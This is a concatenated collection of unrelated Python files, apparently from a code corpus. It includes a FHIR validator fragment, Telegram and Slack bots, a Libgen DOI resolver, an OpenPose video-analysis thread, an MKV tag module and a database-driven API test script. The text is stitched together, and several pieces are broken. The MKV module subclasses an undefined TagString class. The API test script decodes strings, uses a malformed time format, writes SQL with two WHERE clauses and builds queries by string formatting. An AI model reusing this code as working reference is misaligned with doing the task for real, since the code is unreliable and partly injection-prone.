"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"definition": [
"definitionCanonical",
"definitionCodeableConcept",
"definitionDataRequirement",
"definitionExpression",
"definitionReference",
"definitionTriggerDefinition",
],
"participantEffective": [
"participantEffectiveDateTime",
"participantEffectiveDuration",
"participantEffectivePeriod",
"participantEffectiveTiming",
],
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
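# --- Hedged usage sketch (not part of the generated model) ---
# The root validator above enforces the definition[x] choice: exactly one of the
# definition* fields must be set (one_of_many_required=True). Assuming the
# standard pydantic constructor of this model, the call below raises ValueError
# because two choices are populated, while supplying only one of them validates:
#
#     EvidenceVariableCharacteristic(
#         definitionCodeableConcept={"text": "Type 2 diabetes"},
#         definitionExpression={"language": "text/cql", "expression": "..."},
#     )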
|
StarcoderdataPython
|
5190752
|
from telegram.ext import Updater, CommandHandler, CallbackQueryHandler
import telegram
from Utils import Utils
import RuBot, BusBot, CalendarBot, CanteenBot, EventsBot, DateBot, DatabaseConnection
from conf.settings import telegramToken
import threading
ruBot = RuBot.RuBot()
canteenBot = CanteenBot.CanteenBot()
busBot = BusBot.BusBot()
calendarBot = CalendarBot.CalendarBot()
eventsBot = EventsBot.EventsBot()
dateBot = DateBot.DateBot()
databaseConnection = DatabaseConnection.DatabaseConnection()
def callHandler(bot, update):
chatType = Utils.getChatType(bot, update)
if((chatType == 'group' or chatType == 'supergroup') and not Utils.isGroupAdmin(bot, update)):
bot.answerCallbackQuery(
callback_query_id = update['callback_query']['id'],
text = 'Foi mal ' + Utils.getUserFirstName(bot, update) + ', somente admins deste grupo podem usar o bot. Se quiser utilizar o bot, chama no privado @UFFS_Bot',
show_alert = True
)
return
if update.callback_query.data == 'menu-ru':
ruBot.selectCampus(bot, update)
elif update.callback_query.data[:2] == 'RU':
ruBot.showCardapio(bot, update, update.callback_query.data[3:])
elif update.callback_query.data == 'unsub':
ruBot.unsubToPeriodicMenu(bot, update)
elif update.callback_query.data[:4] == 'AUTO':
ruBot.subToPeriodicMenu(bot, update, update.callback_query.data)
elif update.callback_query.data == 'auto-menu':
ruBot.selectPeriod(bot, update)
elif update.callback_query.data == 'daily':
ruBot.selectCampusAuto(bot, update, 'daily')
elif update.callback_query.data == 'weekly':
ruBot.selectCampusAuto(bot, update, 'weekly')
elif update.callback_query.data == 'menu-canteen':
canteenBot.selectCampus(bot, update)
elif update.callback_query.data[:7] == 'canteen':
canteenBot.showCardapio(bot, update)
elif update.callback_query.data == 'bus-schedules':
busBot.selectCampus(bot, update)
elif update.callback_query.data[:3] == 'bus':
busBot.selectStartPoint(bot, update, update.callback_query.data[4:])
elif update.callback_query.data[:13] == 'startPointBus':
busBot.showSchedule(bot, update, update.callback_query.data[14:])
elif update.callback_query.data == 'academic-calendar':
calendarBot.getCalendar(bot, update)
elif update.callback_query.data == 'events-schedules':
eventsBot.showEvents(bot, update)
elif update.callback_query.data == 'academic-date':
dateBot.selectTerm(bot, update)
elif update.callback_query.data[:4] == 'date':
dateBot.searchTerm(bot, update, update.callback_query.data[5:])
elif update.callback_query.data == 'main-menu':
Utils.showStartMenuInExistingMsg(bot, update)
def downloadNeededFiles():
calendarBot.downloadCalendar()
def main():
downloadNeededFiles()
databaseConnection.createTables()
bot = telegram.Bot(telegramToken)
updater = Updater(bot=bot)
dp = updater.dispatcher
dp.add_handler(CommandHandler('start', Utils.showStartMenu))
dp.add_handler(CommandHandler('auto', ruBot.subToPeriodicMenu))
dp.add_handler(CommandHandler('autoCancel', ruBot.unsubToPeriodicMenu))
dp.add_handler(CallbackQueryHandler(callHandler))
thread = threading.Thread(target = ruBot.sendMenuPeriodically, args = (bot,))
thread.start()
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
11366323
|
<reponame>cclauss/confidant<gh_stars>1-10
import unittest
from mock import patch
from mock import Mock
from confidant import settings
from confidant.encrypted_settings import EncryptedSettings
class EncryptedSettingsTest(unittest.TestCase):
def test_register(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
self.assertEqual(enc_set.secret_names, ['Foo'])
def test_get_registered(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
enc_set.decrypted_secrets = {'Foo': 'DecryptedBar'}
self.assertEqual(enc_set.get_secret('Foo'), 'DecryptedBar')
def test_get_registered_default(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
enc_set.register('Bar', 'Baz')
enc_set.decrypted_secrets = {'Foo': 'DecryptedFoo'}
self.assertEqual(enc_set.get_secret('Bar'), 'Baz')
@patch(
'confidant.encrypted_settings.cryptolib.decrypt_datakey',
return_value='1cVUbJT58SbMt4Wk4xmEZoNhZGdWO_vg1IJiXwc6HGs='
)
@patch(
'confidant.encrypted_settings.Fernet.decrypt',
return_value='{secret: value, secret2: value2}\n'
)
    def test_bootstrap(self, mockdecrypt, mockdecryptkey):
enc_set = EncryptedSettings(None)
decrypted = enc_set._bootstrap(
'{"secrets": "encryptedstring", "data_key": "dGhla2V5"}'
)
self.assertEqual(decrypted['secret2'], 'value2')
def test_bootstrap_filefail(self):
enc_set = EncryptedSettings(None)
decrypted = enc_set._bootstrap('file://FILE/DOES/NOT/EXIST')
self.assertEqual(decrypted, {})
|
StarcoderdataPython
|
11249022
|
<reponame>WorkShoft/python-developer-delectatech
from .baserepository import BaseRepo
from restaurants.services import get_mongo_client
class MongoRestaurantRepo(BaseRepo):
client = get_mongo_client()
db = client.python_developer_db
collection = db.segment_collection
def _query(self, params={}, first=False, **kwargs):
"""
Supports one condition per field
Supports None values
Duplicates need to be removed when many records are retrieved,
because a restaurant can be embedded in several segments
params: dict
{
"popularity_rate": {"gt": 5.5},
"satisfaction_rate": {"ne": None},
}
first : bool, optional
Whether you want to retrieve one or many objects
"""
params = {
field: {f"${operator}": value for operator, value in condition.items()}
for field, condition in params.items()
}
projection = {
"_id": 0,
"restaurants": {
"$elemMatch": {
"$and": [{field: condition} for field, condition in params.items()]
}
},
}
query = [
i["restaurants"][0]
for i in self.collection.find({}, projection=projection)
if i.get("restaurants")
]
if first:
return query[0]
query_without_duplicates = [dict(i) for i in {tuple(q.items()) for q in query}]
return query_without_duplicates
|
StarcoderdataPython
|
1886020
|
import re
import json
import asyncio
import websockets
from slacker import Slacker
from conf import *
from dust import Dust
slack = Slacker(TOKEN)
response = slack.rtm.start()
sock_endpoint = response.body['url']
# Send message to slack channel
def extract_message(channel, msg):
cmd = msg.split(' ')
if CMD_PREFIX != cmd[0]:
return 'not command'
if 1 < len(cmd):
if cmd[1] == 'help':
slack.chat.post_message(channel, '@dust-attack <지역>', as_user=True)
elif bool(re.match('[가-힣]+', cmd[1])):
dust = Dust(API_KEY)
location = dust.getLocation(cmd[1])
if location == None:
slack.chat.post_message(channel, '잘못된 지역입니다.', as_user=True)
else:
aqi = dust.getDust(location)
slack.chat.post_message(channel, aqi, as_user=True)
else:
slack.chat.post_message(channel, '????', as_user=True)
else:
slack.chat.post_message(channel, '@dust-attack help', as_user=True)
# Get message from slack channel
async def execute_bot():
ws = await websockets.connect(sock_endpoint)
while True:
msg = await ws.recv()
ext_msg = json.loads(msg)
try:
if ext_msg['type'] == 'message':
extract_message(ext_msg['channel'], ext_msg['text'])
except:
pass
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(execute_bot())
asyncio.get_event_loop().run_forever()
|
StarcoderdataPython
|
5107986
|
<filename>nexus/pylon/sources/libgen_doi.py
import re
from typing import AsyncIterable
from library.logging import error_log
from nexus.pylon.exceptions import RegexNotFoundError
from .base import (
DoiSource,
PreparedRequest,
)
class LibgenDoiSource(DoiSource):
base_url = 'http://libgen.gs'
resolve_timeout = 10
async def resolve(self) -> AsyncIterable[PreparedRequest]:
async with self.get_resolve_session() as session:
url = f'{self.base_url}/scimag/ads.php?doi={self.doi}'
async with session.get(
url,
timeout=self.resolve_timeout
) as resp:
downloaded_page_bytes = await resp.read()
downloaded_page = downloaded_page_bytes.decode('utf-8', 'backslashreplace')
match = re.search(
'https?://.*/scimag/get\\.php\\?doi=.*&key=[A-Za-z0-9]+',
downloaded_page,
re.IGNORECASE,
)
if match:
yield PreparedRequest(method='get', url=match.group())
else:
error_log(RegexNotFoundError(url=url))
|
StarcoderdataPython
|
11315956
|
from ..imports.qt import QtCore, pyqtSignal, pyqtSlot
from ..imports.openpose import OPENPOSE_LOADED, OPENPOSE_MODELS_PATH
if OPENPOSE_LOADED:
from ..imports.openpose import op
import cv2
import numpy as np
def getLengthLimb(data, keypoint1: int, keypoint2: int):
if data[keypoint1, 2] > 0.0 and data[keypoint2, 2] > 0:
return np.linalg.norm([data[keypoint1, 0:2] - data[keypoint2, 0:2]])
return 0
class VideoAnalysisThread(QtCore.QThread):
newFrame = pyqtSignal(np.ndarray)
def __init__(self, videoSource):
super().__init__()
self.infoText = ""
self.personID = 0
self.running = False
self.last_frame = np.array([])
self.videoSource = videoSource
## Starting OpenPose ##
#######################
if OPENPOSE_LOADED:
params = dict()
params["model_folder"] = str(OPENPOSE_MODELS_PATH)
params["face"] = False
params["hand"] = True
params["disable_multi_thread"] = False
netRes = 15 # Default 22
params["net_resolution"] = "-1x" + str(16 * netRes)
self.opWrapper = op.WrapperPython()
self.datum = op.Datum()
self.opWrapper.configure(params)
self.opWrapper.start()
def run(self):
while OPENPOSE_LOADED:
if self.running:
frame = self.videoSource.getLastFrame()
                # Check that a frame exists; `frame != None` is ambiguous when frame is a numpy array
                if (type(frame) != type(None)) and not np.array_equal(
                    self.last_frame, frame
                ):
                    self.last_frame = frame
                    frame = self.resizeCvFrame(frame, 0.5)
self.datum.cvInputData = frame
self.opWrapper.emplaceAndPop([self.datum])
frameOutput = self.datum.cvOutputData
self.newFrame.emit(frameOutput)
@pyqtSlot(bool)
def setState(self, s: bool):
self.running = s
def getHandData(self, handID: int):
"""Return the key points of the hand seen in the image (cf. videoSource).
Args:
handID (int): 0 -> Left hand | 1 -> Right hand
Returns:
            np.ndarray((3,21),float): Coordinates x, y and the accuracy score for each of the 21 key points.
None if the given hand is not detected.
"""
outputArray = None
handKeypoints = np.array(self.datum.handKeypoints)
nbrPersonDetected = handKeypoints.shape[1] if handKeypoints.ndim > 2 else 0
handAccuaracyScore = 0.0
if nbrPersonDetected > 0:
handAccuaracyScore = handKeypoints[handID, self.personID].T[2].sum()
handDetected = handAccuaracyScore > 1.0
if handDetected:
handKeypoints = handKeypoints[handID, self.personID]
# Initialize with the length of the first segment of each fingers
lengthFingers = [
np.sqrt(
(handKeypoints[0, 0] - handKeypoints[i, 0]) ** 2
+ (handKeypoints[0, 1] - handKeypoints[i, 1]) ** 2
)
for i in [1, 5, 9, 13, 17]
]
for i in range(3): # Add length of other segments of each fingers
for j in range(len(lengthFingers)):
x = (
handKeypoints[1 + j * 4 + i + 1, 0]
- handKeypoints[1 + j * 4 + i, 0]
)
y = (
handKeypoints[1 + j * 4 + i + 1, 1]
- handKeypoints[1 + j * 4 + i, 1]
)
lengthFingers[j] += np.sqrt(x ** 2 + y ** 2)
normMax = max(lengthFingers)
handCenterX = handKeypoints.T[0].sum() / handKeypoints.shape[0]
handCenterY = handKeypoints.T[1].sum() / handKeypoints.shape[0]
outputArray = np.array(
[
(handKeypoints.T[0] - handCenterX) / normMax,
-(handKeypoints.T[1] - handCenterY) / normMax,
(handKeypoints.T[2]),
]
)
return outputArray, handAccuaracyScore
def getBodyData(self):
outputArray = None
accuaracyScore = 0.0
if len(self.datum.poseKeypoints.shape) > 0:
# Read body data
outputArray = self.datum.poseKeypoints[self.personID]
accuaracyScore = outputArray[:, 2].sum()
# Find bouding box
min_x, max_x = float("inf"), 0.0
min_y, max_y = float("inf"), 0.0
for keypoint in outputArray:
if keypoint[2] > 0.0: # If keypoint exists in image
min_x = min(min_x, keypoint[0])
max_x = max(max_x, keypoint[0])
min_y = min(min_y, keypoint[1])
max_y = max(max_y, keypoint[1])
# Centering
np.subtract(
outputArray[:, 0],
(min_x + max_x) / 2,
where=outputArray[:, 2] > 0.0,
out=outputArray[:, 0],
)
np.subtract(
(min_y + max_y) / 2,
outputArray[:, 1],
where=outputArray[:, 2] > 0.0,
out=outputArray[:, 1],
)
# Scaling
normalizedPartsLength = np.array(
[
getLengthLimb(outputArray, 1, 8) * (16.0 / 5.2), # Torso
getLengthLimb(outputArray, 0, 1) * (16.0 / 2.5), # Neck
getLengthLimb(outputArray, 9, 10) * (16.0 / 3.6), # Right thigh
getLengthLimb(outputArray, 10, 11)
* (16.0 / 3.5), # Right lower leg
getLengthLimb(outputArray, 12, 13) * (16.0 / 3.6), # Left thigh
getLengthLimb(outputArray, 13, 14) * (16.0 / 3.5), # Left lower leg
getLengthLimb(outputArray, 2, 5) * (16.0 / 3.4), # Shoulders
]
)
# Mean of non-zero values
normalizedPartsLength = normalizedPartsLength[normalizedPartsLength > 0.0]
if len(normalizedPartsLength) > 0:
scaleFactor = np.mean(normalizedPartsLength)
else:
# print("Scaling error")
return None, 0.0
np.divide(outputArray[:, 0:2], scaleFactor, out=outputArray[:, 0:2])
if np.any((outputArray > 1.0) | (outputArray < -1.0)):
# print("Scaling error")
return None, 0.0
outputArray = outputArray.T
return outputArray, accuaracyScore
def getInfoText(self) -> str:
handKeypoints = np.array(self.datum.handKeypoints)
nbrPersonDetected = handKeypoints.shape[1] if handKeypoints.ndim > 2 else 0
self.infoText = ""
self.infoText += str(nbrPersonDetected) + (
" person detected" if nbrPersonDetected < 2 else " person detected"
)
if nbrPersonDetected > 0:
leftHandDetected = handKeypoints[0, self.personID].T[2].sum() > 1.0
rightHandDetected = handKeypoints[1, self.personID].T[2].sum() > 1.0
if rightHandDetected and leftHandDetected:
self.infoText += (
", both hands of person " + str(self.personID + 1) + " detected."
)
elif rightHandDetected or leftHandDetected:
self.infoText += (
", "
+ ("Right" if rightHandDetected else "Left")
+ " hand of person "
+ str(self.personID + 1)
+ " detected."
)
else:
self.infoText += (
", no hand of person " + str(self.personID + 1) + " detected."
)
return self.infoText
def getFingerLength(self, fingerData):
length = 0.0
for i in range(fingerData.shape[0] - 1):
x = fingerData[i + 1, 0] - fingerData[i, 0]
y = fingerData[i + 1, 1] - fingerData[i, 1]
length += np.sqrt(x ** 2 + y ** 2)
return length
def resizeCvFrame(self, frame, ratio: float):
width = int(frame.shape[1] * ratio)
height = int(frame.shape[0] * ratio)
dim = (width, height)
# resize image in down scale
resized = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
return resized
def isRaisingHand(self):
        # getBodyData returns a (keypoints, accuracy) tuple; keypoints come back transposed (3, 25)
        poseKeypoints, _ = self.getBodyData()
        raisingRight = False
        raisingLeft = False
        if poseKeypoints is not None:
            # Restore one (x, y, accuracy) row per keypoint for the indexing below
            poseKeypoints = poseKeypoints.T
rightHand_x, rightHand_y, rightHand_a = poseKeypoints[4]
leftHand_x, leftHand_y, leftHand_a = poseKeypoints[7]
rightShoulder_x, rightShoulder_y, rightShoulder_a = poseKeypoints[2]
leftShoulder_x, leftShoulder_y, leftShoulder_a = poseKeypoints[5]
try:
shoulderSlope = (rightShoulder_y - leftShoulder_y) / (
rightShoulder_x - leftShoulder_x
)
except:
shoulderSlope = 0.0
shoulderOri = rightShoulder_y - shoulderSlope * rightShoulder_x
if leftHand_a > 0.1:
raisingLeft = leftHand_y < (
shoulderSlope * leftHand_x + shoulderOri
) # y axis oriented from top to down in images
raisingLeft = (
raisingLeft and leftHand_y < poseKeypoints[6, 1]
) # Check if hand above elbow
else:
raisingLeft = False
if rightHand_a > 0.1:
raisingRight = rightHand_y < (shoulderSlope * rightHand_x + shoulderOri)
raisingRight = raisingRight and rightHand_y < poseKeypoints[3, 1]
else:
raisingRight = False
return raisingLeft, raisingRight
|
StarcoderdataPython
|
5118662
|
from .pcan import CanBus, CanFdBus
|
StarcoderdataPython
|
6519818
|
<reponame>szrharrison/py-mkv<gh_stars>1-10
from typing import TypeVar
from lib.models.metadata.target_types import AudioTargetTypes, VideoTargetTypes, TargetTypesInt, TargetTypesStr
SimpleSubTags = TypeVar("SimpleSubTags", "TagName", "TagString", "TagDefault", "TagBinary")
TargetsSubTags = TypeVar("TargetsSubTags", "TargetType", "TargetTypeValue", "TagAttachmentUID", "TagChapterUID", "TagEditionUID", "TagTrackUID")
UIDTags = TypeVar("UIDTags", "TagChapterUID", "TagTrackUID", "TagEditionUID", "TagAttachmentUID")
Taggable = TypeVar("Taggable", "Tag", str)
class Tag:
def __init__(self, *content: Taggable):
content_strings = map(lambda tag: str(tag), content)
self.value = "\n" + indent_content("\n".join(content_strings)) + "\n"
def __str__(self):
return "<" + self.__class__.__name__ + ">" + self.value + "</" + self.__class__.__name__ + ">"
class TagBinary(TagString):
def __init__(self, content: bytearray):
super().__init__(str(content))
class SimpleTag(Tag):
def __init__(self, *content: SimpleSubTags):
self.__class__.__name__ = "SimpleTag"
super().__init__(*content)
class Targets(Tag):
def __init__(self, *content: TargetsSubTags):
super().__init__(*content)
class TargetType(TagString):
def __init__(self, content: TargetTypesStr):
super().__init__(content)
if isinstance(content, (VideoTargetTypes, AudioTargetTypes)):
self.value = content.name
else:
self.value = content
class TargetTypeValue(TagString):
def __init__(self, content: TargetTypesInt):
super().__init__(content)
if isinstance(content, (VideoTargetTypes, AudioTargetTypes)):
self.value = content.value
else:
self.value = content
class TagTrackUID(TagString):
pass
class TagChapterUID(TagString):
pass
class TagAttachmentUID(TagString):
pass
class TagEditionUID(TagString):
pass
|
StarcoderdataPython
|
1813157
|
<filename>apitest/apiauto_testcase3.py
#coding:utf-8
import requests,time,sys,re
import urllib,zlib
import pymysql
import HtmlTestRunner
import unittest
from trace import CoverageResults
import json
from idlelib.rpc import response_queue
from time import sleep
#import fconfig
HOSTNAME = '127.0.0.1'
class ApiFlow(unittest.TestCase):
"""登录支付购物接口流程"""
def setUp(self):
time.sleep(1)
    def test_readSQLcase(self):
sql = "SELECT id,`apiname`,apiurl,apimethod,apiparamvalue,apiresult,`apistatus` from apitest_apistep where apitest_apistep.Apitest_id=2 "
coon = pymysql.connect(user='root', passwd='<PASSWORD>', db='autotest', port=3306, host='127.0.0.1',charset='utf8')
cursor = coon.cursor()
aa = cursor.execute(sql)
info = cursor.fetchmany(aa)
print(info)
for ii in info:
case_list = []
case_list.append(ii)
#CredentialId()
interfaceTest(case_list)
coon.commit()
cursor.close()
coon.close()
def readSQLcase():
sql = "SELECT id,`apiname`,apiurl,apimethod,apiparamvalue,apiresult,`apistatus` FROM apitest_apistep where apitest_apistep.Apitest_id=3 "
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor = coon.cursor()
aa=cursor.execute(sql)
info = cursor.fetchmany(aa)
for ii in info:
case_list = []
case_list.append(ii)
# CredentialId()
interfaceTest(case_list)
coon.commit()
cursor.close()
coon.close()
def interfaceTest(case_list):
res_flags = []
requst_urls = []
responses = []
strinfo = re.compile('{TaskId}')
strinfo1 = re.compile('{AssetId}')
strinfo2 = re.compile('{PointId}')
assetinfo = re.compile('{assetno}')
tasknoinfo = re.compile('{taskno}')
schemainfo = re.compile('{schema}')
for case in case_list:
try:
case_id = case[0]
interface_name = case[1]
method = case[3]
url = case[2]
param = case[4]
res_check = case[5]
except Exception as e:
return '测试用例格式不正确!%s'%e
if param == '':
new_url = 'http://'+'api.test.com.cn'+url
elif param == 'null':
new_url = 'http://'+url
else:
url = strinfo.sub(TaskId,url)
param = strinfo2.sub(PointId,param)
param = strinfo.sub(TaskId,param)
param = tasknoinfo.sub(taskno,param)
new_url = 'http://'+'127.0.0.1'+url
requst_urls.append(new_url)
if method.upper() == 'GET':
headers = {'Authorization':'', 'Content-Type':'application/json'}
if "=" in urlParam(param):
data = None
                print(str(case_id) + ' request is get ' + new_url + '?' + urlParam(param))
                results = requests.get(new_url + '?' + urlParam(param), data, headers=headers).text
                print(' response is get ' + results)
responses.append(results)
res = readRes(results,'')
else:
print(' request is get '+new_url+' body is '+urlParam(param))
data = None
req = urllib.request.Request(url=new_url,data=data,headers=headers,method="GET")
results = urllib.request.urlopen(req).read()
print(' response is get ')
print(results)
res = readRes(results,res_check)
#print results
if 'pass' == res:
res_flags.append('pass')
writeResult(case_id,'1')
caseWriteResult(case_id,'1')
else:
res_flags.append('fail')
writeResult(case_id,'0')
caseWriteResult(case_id,'0')
if method.upper()=='PUT':
headers = {'HOST':HOSTNAME,'Connection':'keep-alive','CredentialId':id,'Content-Type':'application/json'}
body_data=param
            results = requests.put(url=new_url, data=body_data, headers=headers).text
responses.append(results)
res=readRes(results,res_check)
if 'pass' == res:
writeResult(case_id,'pass')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'fail')
writeBug(case_id,interface_name,new_url,results,res_check)
try:
preOrderSN(results)
except:
print('ok')
if method.upper()=='PATCH':
headers = {'Authorization':'Credential '+id, 'Content-Type':'application/json' }
data=None
results = requests.patch(new_url+'?'+urlParam(param),data,headers=headers).text
responses.append(results)
res = readRes(results,res_check)
if 'pass'==res:
writeResult(case_id,'pass')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'fail')
writeBug(case_id,interface_name,new_url,results,res_check)
try:
preOrderSN(results)
except:
print('ok')
if method.upper()=='POST':
headers = {'Authorization':'Credential '+id, 'Content-Type':'application/json'}
if '=' in urlParam(param):
data = None
                results = requests.post(new_url + '?' + urlParam(param), data, headers=headers).text
                print(' response is post ' + results)
responses.append(results)
res = readRes(results,'')
else:
                print(str(case_id) + ' request is ' + new_url + ' body is ' + urlParam(param))
                results = requests.post(new_url, data=urlParam(param).encode('utf-8'), headers=headers).text
                print(' response is post ' + results)
responses.append(results)
res = readRes(results,res_check)
if 'pass'==res:
writeResult(case_id,'1')
res_flags.append('pass')
else:
res_flags.append('fail')
writeResult(case_id,'0')
                writeBug(case_id, interface_name, new_url, results, res_check)
try:
TaskId(results)
except:
print('ok1')
try:
PointId(results)
except:
print('ok2')
def readRes(res,res_check):
    # The response may be str (from requests .text) or bytes (from urllib .read())
    if isinstance(res, bytes):
        res = res.decode()
    res = res.replace('":"',"=").replace('":',"=")
res_check = res_check.split(';')
for s in res_check:
if s in res:
pass
else:
return '错误,返回参数和预期结果不一致'+s
return 'pass'
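# --- Hedged illustration (not in the original script) ---
# res_check is a ';'-separated list of substrings that must all appear in the
# normalised response text. With made-up values:
#     readRes('{"Code":200,"Message":"Success"}', 'Code=200;Message=Success')
# returns 'pass', while a missing substring returns the error message instead.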
def urlParam(param):
param1=param.replace('"','"')
return param1
def CredentialId():
global id
url = 'http://'+'api.test.com.cn'+'/api/Security/Authentication/Signin/web'
body_data=json.dumps({"Identity":'test',"Password":'<PASSWORD>'})
headers = { 'Connection':'keep-alive','Content-Type':'application/json'}
response = requests.post(url=url,data=body_data,headers=headers)
data=response.text
regx = '.*"CredentialId":"(.*)","Scene"'
pm = re.search(regx,data)
id = pm.group(1)
def preOrderSN(results):
global preOrderSN
regx = '.*"preOrderSN":"(.*)","toHome"'
pm = re.search(regx,results)
if pm:
preOrderSN = pm.group(1).encode('utf-8')
return preOrderSN
return False
def TaskId(results):
global TaskId
regx = '.*"TaskId":(.*),"PlanId"'
pm=re.search(regx,results)
if pm:
TaskId = pm.group(1).encode('utf-8')
return TaskId
return False
def taskno(param):
global taskno
a = int(time.time())
taskno = 'task_' + str(a)
return taskno
def writeResult(case_id,result):
result = result.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
sql = "UPDATE apitest_apistep set apitest_apistep.apistatus=%s,apitest_apistep.create_time=%s where apitest_apistep.id=%s;"
param = (result,now,case_id)
print('api autotest result is '+result.decode())
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor=coon.cursor()
cursor.execute(sql,param)
coon.commit()
cursor.close()
coon.close()
def caseWriteResult(case_id,result):
result = result.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
sql = "UPDATE apitest_apitest as atat set atat.apistatus=%s,atat.create_time=%s where apitest_apistep.id=%s where atat.id=%s;"
param = (result,now,case_id)
print('api autotest result is '+result.decode())
coon = pymysql.connect(user='root', passwd='<PASSWORD>', db='autotest', port=3306, host='127.0.0.1', charset='utf8')
cursor = coon.cursor()
cursor.execute(sql, param)
coon.commit()
cursor.close()
coon.close()
def writeBug(bug_id,interface_name,request,response,res_check):
interface_name = interface_name.encode('utf-8')
res_check = res_check.encode('utf-8')
request = request.encode('utf-8')
now = time.strftime("%Y-%m-%d %H:%M:%S")
bugname = str(bug_id)+'_'+interface_name.decode()+'_出错了'
bugdetail = '[请求数据]<br />'+request.decode()+'<br />'+'[预期结果]<br/>'+res_check.decode()+'<br/>'+'<br/>'+'[响应数据]<br />'+'<br/>'+response.decode()
print(bugdetail)
sql = "INSERT INTO `bug_bug`(`bugname`, `bugdetail`, `bugstatus`, `buglevel`, `bugcreater`, `bugassign`, `create_time`, `product_id`) VALUES('%s', '%s', '1', '1', 'aaa', 'aaa', '%s', '2');"%(bugname,pymysql.escape_string(bugdetail),now)
coon = pymysql.connect(user='root',passwd='<PASSWORD>',db='autotest',port=3306,host='127.0.0.1',charset='utf8')
cursor=coon.cursor()
cursor.execute(sql)
coon.commit()
cursor.close()
coon.close()
if __name__=="__main__":
now = time.strftime("%Y-%m-%-%H_%M_%S",time.localtime(time.time()))
testunit = unittest.TestSuite()
testunit.addTest(ApiFlow("test_readSQLcase"))
filename=r"D:\Study\IT\01.Dev\2.Python\exercizes\autotest\apitest\templates\apitest_report.html"
fp=open(filename,'wb')
runner = HtmlTestRunner.HTMLTestRunner(stream=fp,title=u"流程接口测试报告",descriptions=u"接口场景接口")
runner.run(testunit)
#readSQLcase()
print('Done!')
time.sleep(1)
|
StarcoderdataPython
|